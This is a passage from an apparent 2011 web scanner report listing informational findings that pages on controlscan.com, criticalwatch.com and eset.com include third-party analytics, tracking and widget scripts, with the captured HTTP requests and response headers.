<script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.controlscan.com&amp;size=M&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en"></script>
...[SNIP]...
<!-- VTRENZ Tracking-->
<script src="https://gw-services.vtrenz.net/WebCookies/iMAWebCookie.js?05B7F374-D914-47E4-8F04-8DF29390CEC9" type="text/javascript"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="https://s.yimg.com/mi/eu/ywa.js"></script>
...[SNIP]...

23.36. https://www.controlscan.com/shoppingcart.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.controlscan.com
Path:   /shoppingcart.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /shoppingcart.php HTTP/1.1
Host: www.controlscan.com
Connection: keep-alive
Referer: https://www.controlscan.com/pcicompliance.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=00f4el4lcuvnop42qop34mkqh4; __utmz=180386997.1303732833.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fpc1000725800122=O1TwOju5|4ybarsbLaa|fses1000725800122=|4ybarsbLaa|O1TwOju5|fvis1000725800122=Zj1odHRwcyUzQSUyRiUyRnd3dy5jb250cm9sc2Nhbi5jb20lMkYmYj1Db250cm9sU2NhbiUyMFBDSSUyMENvbXBsaWFuY2UlMjAlN0MlMjBHZXQlMjBQQ0klMjBDb21wbGlhbnQlMjBUb2RheSE=|8MYMHMsoss|8MYMHMsoss|8MYMHMsoss|8|8MYMHMsoss|8MYMHMsoss; __utma=180386997.730761609.1303732833.1303732833.1303735963.2; __utmc=180386997; __utmb=180386997.2.10.1303735963; com.vtrenz.iMAWebCookie=49379056-69d2-6147-26ad-65d29c6189eb; com.vtrenz.iMA.session=3cd51bd8-477e-ec0e-65cc-8ca3a9c2b5ac

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:55:00 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="PHY DEM ONL STA PUR NAV COM OUR DELo CUR ADM DEV IDC COR BUS DSP"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32910

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<!-- BEGIN LIVECHAT track tag. See also www.livechatinc.com -->
<script language="JavaScript" src="//server.livechatinc.net/licence/1004853/script.cgi?lang=en&amp;groups=0" type="text/javascript"></script>
...[SNIP]...
<!-- Verisign Seal-->
<script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.controlscan.com&amp;size=M&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en"></script>
...[SNIP]...
<!-- VTRENZ Tracking-->
<script src="https://gw-services.vtrenz.net/WebCookies/iMAWebCookie.js?05B7F374-D914-47E4-8F04-8DF29390CEC9" type="text/javascript"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="https://s.yimg.com/mi/eu/ywa.js"></script>
...[SNIP]...

23.37. http://www.criticalwatch.com/company/critical-watch-career.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.criticalwatch.com
Path:   /company/critical-watch-career.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /company/critical-watch-career.aspx HTTP/1.1
Host: www.criticalwatch.com
Proxy-Connection: keep-alive
Referer: http://www.criticalwatch.com/company/critical-watch-security.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164981229.1303732829.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164981229.1572272348.1303732829.1303732829.1303735956.2; __utmc=164981229; __utmb=164981229

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 13:02:32 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 8730

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<!-- Google Adwords BEGIN -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

23.38. http://www.criticalwatch.com/company/critical-watch-contact.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.criticalwatch.com
Path:   /company/critical-watch-contact.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /company/critical-watch-contact.aspx HTTP/1.1
Host: www.criticalwatch.com
Proxy-Connection: keep-alive
Referer: http://www.criticalwatch.com/company/critical-watch-career.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164981229.1303732829.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164981229.1572272348.1303732829.1303732829.1303735956.2; __utmc=164981229; __utmb=164981229

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 13:02:34 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 14936


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Temp
...[SNIP]...
</script><script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6Le5HQcAAAAAALOm71gVj_YwLY75DVJVpFip8USF">

   </script>
...[SNIP]...
<!-- Google Adwords BEGIN -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

23.39. http://www.criticalwatch.com/company/critical-watch-security.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.criticalwatch.com
Path:   /company/critical-watch-security.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /company/critical-watch-security.aspx HTTP/1.1
Host: www.criticalwatch.com
Proxy-Connection: keep-alive
Referer: http://www.criticalwatch.com/support/critical-watch-support.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164981229.1303732829.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164981229.1572272348.1303732829.1303732829.1303735956.2; __utmc=164981229; __utmb=164981229

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 13:02:31 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 9062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<!-- Google Adwords BEGIN -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

23.40. http://www.criticalwatch.com/company/management.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.criticalwatch.com
Path:   /company/management.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /company/management.aspx HTTP/1.1
Host: www.criticalwatch.com
Proxy-Connection: keep-alive
Referer: http://www.criticalwatch.com/company/critical-watch-contact.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164981229.1303732829.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164981229.1572272348.1303732829.1303732829.1303735956.2; __utmc=164981229; __utmb=164981229

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 13:08:19 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 15884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<!-- Google Adwords BEGIN -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

23.41. http://www.criticalwatch.com/products/mssp.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.criticalwatch.com
Path:   /products/mssp.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/mssp.aspx HTTP/1.1
Host: www.criticalwatch.com
Proxy-Connection: keep-alive
Referer: http://www.criticalwatch.com/products/vulnerability-management-overview.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164981229.1303732829.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164981229.1572272348.1303732829.1303732829.1303735956.2; __utmc=164981229; __utmb=164981229

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 13:02:05 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 12048

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<!-- Google Adwords BEGIN -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

23.42. http://www.criticalwatch.com/products/vulnerability-management-ips.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.criticalwatch.com
Path:   /products/vulnerability-management-ips.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/vulnerability-management-ips.aspx HTTP/1.1
Host: www.criticalwatch.com
Proxy-Connection: keep-alive
Referer: http://www.criticalwatch.com/products/mssp.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164981229.1303732829.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164981229.1572272348.1303732829.1303732829.1303735956.2; __utmc=164981229; __utmb=164981229

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 13:02:06 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 13783

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<!-- Google Adwords BEGIN -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

23.43. http://www.criticalwatch.com/products/vulnerability-management-overview.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.criticalwatch.com
Path:   /products/vulnerability-management-overview.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/vulnerability-management-overview.aspx HTTP/1.1
Host: www.criticalwatch.com
Proxy-Connection: keep-alive
Referer: http://www.criticalwatch.com/support/critical-watch-resource-library.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164981229.1303732829.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164981229.1572272348.1303732829.1303732829.1303735956.2; __utmc=164981229; __utmb=164981229

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 13:02:01 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 18958

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<!-- Google Adwords BEGIN -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

23.44. http://www.criticalwatch.com/solutions/vulnerability-management.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.criticalwatch.com
Path:   /solutions/vulnerability-management.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /solutions/vulnerability-management.aspx HTTP/1.1
Host: www.criticalwatch.com
Proxy-Connection: keep-alive
Referer: http://www.criticalwatch.com/vulnerability-scan-trial.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164981229.1303732829.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164981229.1572272348.1303732829.1303732829.1303735956.2; __utmc=164981229; __utmb=164981229

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 13:02:24 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 12208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<!-- Google Adwords BEGIN -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

23.45. http://www.criticalwatch.com/support/critical-watch-resource-library.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.criticalwatch.com
Path:   /support/critical-watch-resource-library.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /support/critical-watch-resource-library.aspx HTTP/1.1
Host: www.criticalwatch.com
Proxy-Connection: keep-alive
Referer: http://www.criticalwatch.com/support/fusionvm-technical-faq.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164981229.1303732829.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164981229.1572272348.1303732829.1303732829.1303735956.2; __utmc=164981229; __utmb=164981229

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 13:01:59 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 9219


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Temp
...[SNIP]...
<!-- Google Adwords BEGIN -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

23.46. http://www.criticalwatch.com/support/critical-watch-support.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.criticalwatch.com
Path:   /support/critical-watch-support.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /support/critical-watch-support.aspx HTTP/1.1
Host: www.criticalwatch.com
Proxy-Connection: keep-alive
Referer: http://www.criticalwatch.com/vulnerability-management.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164981229.1303732829.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164981229.1572272348.1303732829.1303732829.1303735956.2; __utmb=164981229; __utmc=164981229

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 12:54:43 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 8976

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<!-- Google Adwords BEGIN -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

23.47. http://www.criticalwatch.com/support/fusionvm-technical-faq.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.criticalwatch.com
Path:   /support/fusionvm-technical-faq.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /support/fusionvm-technical-faq.aspx HTTP/1.1
Host: www.criticalwatch.com
Proxy-Connection: keep-alive
Referer: http://www.criticalwatch.com/support/critical-watch-support.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164981229.1303732829.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164981229.1572272348.1303732829.1303732829.1303735956.2; __utmc=164981229; __utmb=164981229

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 13:01:57 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 36003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<!-- Google Adwords BEGIN -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

23.48. http://www.criticalwatch.com/vulnerability-management.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.criticalwatch.com
Path:   /vulnerability-management.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /vulnerability-management.aspx HTTP/1.1
Host: www.criticalwatch.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=164981229.1572272348.1303732829.1303732829.1303732829.1; __utmc=164981229; __utmz=164981229.1303732829.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 12:52:24 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 12806


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta name="descrip
...[SNIP]...
<!-- Google Adwords BEGIN -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

23.49. http://www.criticalwatch.com/vulnerability-scan-trial.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.criticalwatch.com
Path:   /vulnerability-scan-trial.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /vulnerability-scan-trial.aspx HTTP/1.1
Host: www.criticalwatch.com
Proxy-Connection: keep-alive
Referer: http://www.criticalwatch.com/products/vulnerability-management-ips.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164981229.1303732829.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164981229.1572272348.1303732829.1303732829.1303735956.2; __utmc=164981229; __utmb=164981229

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 13:02:07 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 30086


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<!-- InstanceBegin templat
...[SNIP]...
</script><script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6Le5HQcAAAAAALOm71gVj_YwLY75DVJVpFip8USF">

   </script>
...[SNIP]...
<!-- Google Adwords BEGIN -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

23.50. http://www.eset.com/us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/ HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); mbox=check#true#1303736408|session#1303736347554-914602#1303738208|PC#1303736347554-914602.17#1304945949; __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738202515%3B%20gpv_pageName%3Dus/store%7C1303738202519%3B%20s_nr%3D1303736402523-Repeat%7C1335272402523%3B%20s_invisit%3Dtrue%7C1303738202525%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/store%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257BaddMboxValue%25252528%25252527ns_form_1%25252527%25252529%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DIMAGE%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tnt=3; expires=Fri, 24-Jun-2011 15:14:28 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 26653
Date: Mon, 25 Apr 2011 15:14:28 GMT
X-Varnish: 555646579
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

